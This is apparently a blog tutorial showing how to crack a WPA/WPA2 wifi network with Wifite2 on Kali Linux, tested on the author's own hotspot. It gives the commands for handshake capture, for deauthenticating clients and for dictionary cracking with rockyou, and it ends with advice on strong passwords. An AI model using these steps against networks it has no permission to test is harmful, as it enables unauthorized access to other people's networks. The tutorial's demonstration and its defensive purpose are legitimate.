How to hack a wifi and how to secure yours
How to get into a WPA/WPA2 protected wifi network with wifite and how to avoid being hacked
Before I start, I would like to remind you that WPA2 is still considered secured today. If your wifi password is different than “qwerty” or “batman” you should be fine. But in some cases, we will be able to get into a wifi without knowing the password.
For this demonstration, I will be using Kali Linux 2020.2a (you can download it here for free https://www.kali.org) and an ALFA Network AWUS036NHA antenna. You can find the antenna for less than 30$ on amazon. Once you have it, just plug it in and it should be ready to work.
Like the title says, we’re going to use a program called Wifite2.
What’s Wifite ?
Wifite is a hacking tool which simplifies as f*** wifi hacking. Here is some links where you can find useful information about this software :
- the github project : https://github.com/derv82/wifite2
- the command list (which you can find using wifite -h but anyway) : https://tools.kali.org/wireless-attacks/wifite
Disclaimer
I remind you that it’s illegal to attack a system if you don’t have permission to do so. This demonstration is for educational purposes only. In this post, I’ll use my own wifi. You shouldn’t try it on someone else wifi.
Enough talking, let’s hack
Wifite2 is already installed in the standard version of kali Linux, so I’ll skip the installation part. Open a terminal and start wifite.
sudo wifite -mac
Note : I use -mac to randomize my mac address. It can be useful to avoid being tracked. Furthermore, it doesn’t make you invisible.
All wifi access points discovered by your antenna will be displayed. To stop scanning, use CTRL+C. Then, select the number you want to attack.
For the demonstration, I’ll use my phone hotspot Téléphone Mi.
From now on, everything is automatic. Wifite will try multiple methods to get into the wifi.
WPS attack (pixie dust)
If the access point you’re trying to hack has WPS activated, wifite will try few WPS security breaches, just in case the access point is vulnerable to one of them (few access points models are). Here is a list of vulnerable devices. My phone doesn’t have WPS, so I’ll skip those steps.
PMKID attack
It is a “new” method discovered in 2018 to get the WPA hash without needing someone to be connected (no need of the 4-way handshake for the experts). It doesn’t work on all devices but it’s worth trying.
Note : If you successfully get the hash with this method, you still have to crack the hash (see below).
Unfortunately, in our case it failed.
Handshake attack
Last but not least, the handshake attack. The handshake attack takes place in two steps: first, we steal the encrypted handshake, then we crack the handshake.
Stealing the handshake
The point of this attack is to briefly disconnect an already connected user. It steals what we call the handshake, which is a encrypted communication between the connected device and the access point. In order to succeed, at least one device has to be connected to the access point.
Wifite is listening, but no device is connected to the wifi, so nothing happens. Let’s connect a phone to it.
Wifite discovered a new client and successfully stole the handshake.
Cracking the handshake
We’re not done yet. The handshake is encrypted. We still have to crack it to figure out the wifi passphrase. Few methods are available to crack a password.
The brute force attack : trying all the combination possible aaa, aab, aac … until we find the password
Depending on the password strength, it will take few seconds or millions of years to crack the password. A wifi network passphrase contains at least 8 characters, and up to 60. With a normal computer, brute-forcing will take hundreds of years in the best case scenario. Not really optimal…
There is where word-lists enter in action.
A world-list is a list of probable passwords. Longer your list is, better chances you have to crack the password. There is a lot of word-lists on the internet, some are simple, some are very sophisticated. To get an idea, a really famous word-list is called rockyou.tkt. It contains around 14 millions common passwords.
To demonstrate the importance of the password strength here, I’ll use several passwords to protect my wifi, with increasing difficulties.
Using a weak password
The first password I used was slimshady.
With not much of a surprise, it took less than a second to crack it, with the default wifite word-list. See how easy it was ?
Using a not so weak password
Let’s try with SlimShady1.
The default word-list didn’t found it. That’s a good thing. But let’s try with the word-list, rockyou. We have to tell wifite we want to crack the handshake (with the --crack), because we already stole it. Then we tell wifite where is our dictionary (with the --dict).
sudo wifite --crack --dict yourFolder/rockyou.txt
Then, we select the num we want (here it’s 1) and the cracking tool we want to use (here i’ll go with aircrack). Wifite is writing for us the aircrack command to crack the hash. Isn't it amazing ?
After an hour or so, the password was found too.
Using a really strong password
If you’re using a really strong password, there is little to no chance that we can crack it. If the password is not in the word-lists, we can’t crack the handshake, even if we use bigger word-lists.
Conclusion
WPA/WPA2 wifi security mostly relies on the password. There is few security breaches among all the access points of the market, but they are unusual. The default password is usually a good one. If you change it, make sure it is a very strong password !
